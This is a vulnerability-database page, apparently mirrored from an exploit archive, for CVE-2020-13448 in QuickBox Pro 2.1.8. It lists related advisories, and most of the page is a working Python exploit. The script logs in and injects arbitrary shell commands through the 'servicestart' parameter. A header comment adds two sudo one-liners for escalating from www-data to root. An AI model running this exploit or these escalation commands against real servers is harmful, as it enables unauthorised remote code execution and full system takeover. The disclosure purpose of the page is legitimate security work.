QuickBox Pro 2.1.8 Remote Code Execution

🗓️ 02 Jun 2020 00:00:00Reported by s1ghType

packetstorm🔗 packetstormsecurity.com👁 325 Views

QuickBox Pro 2.1.8 Authenticated Remote Code Execution with Privilege Escalatio

Reporter	Title	Published	Views	Family All 20
0daydb	vBulletin 5.6.1 CVE-2020-12720 - SQL Injection	3 Jun 202015:53	–	0daydb
0daydb	QuickBox Pro 2.1.8 CVE-2020-13448 - Remote Code Execution	3 Jun 202015:51	–	0daydb
0daydb	VMware vCenter Server 6.7 CVE-2020-3952 - Authentication Bypass	3 Jun 202015:50	–	0daydb
0day.today	QuickBox Pro 2.1.8 - Authenticated Remote Code Execution Exploit	1 Jun 202000:00	–	zdt
CNVD	QuickBox Remote Code Execution Vulnerability	2 Jun 202000:00	–	cnvd
CNVD	QuickBox OS Command Injection Vulnerability	2 Jun 202000:00	–	cnvd
Check Point Advisories	HTTP Suspicious Linux Etc Paths (CVE-2020-13448)	14 May 202000:00	–	checkpoint_advisories
Check Point Advisories	QuickBox Remote Code Execution (CVE-2020-13448)	21 Jun 202000:00	–	checkpoint_advisories
CVE	CVE-2020-13448	1 Jun 202015:19	–	cve
Cvelist	CVE-2020-13448	1 Jun 202015:19	–	cvelist

`# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution  
# Date: 2020-05-26  
# Exploit Author: s1gh  
# Vendor Homepage: https://quickbox.io/  
# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/  
# Version: <= 2.1.8  
# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules.  
# Tested on: Debian 9  
# CVE: CVE-2020-13448  
# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE  
  
'''  
Privilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways.  
1. sudo mysql -e '\! /bin/sh'  
2. sudo mount -o bind /bin/sh /bin/mount;sudo mount  
  
'''  
  
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
  
import requests  
import argparse  
import sys  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
from urllib.parse import quote_plus  
  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
  
def exploit(args):  
s = requests.Session()  
print('[*] Sending our payload...')  
  
s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False)  
try:  
s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False)  
except requests.exceptions.ReadTimeout:  
pass  
  
def main():  
parser = argparse.ArgumentParser(description="Authenticated RCE for QuickBox Pro <= v2.1.8")  
parser.add_argument('-i',dest='ip',required=True,help="Target IP Address")  
parser.add_argument('-u',dest='username',required=True,help="Username")  
parser.add_argument('-p',dest='password',required=True,help="Password")  
parser.add_argument('-c',dest='cmd', required=True, help="Command to execute")  
args = parser.parse_args()  
  
exploit(args)  
  
  
if __name__ == '__main__':  
main()  
sys.exit(0)  
`

02 Jun 2020 00:00Current

8.8High risk

Vulners AI Score8.8

EPSS0.39175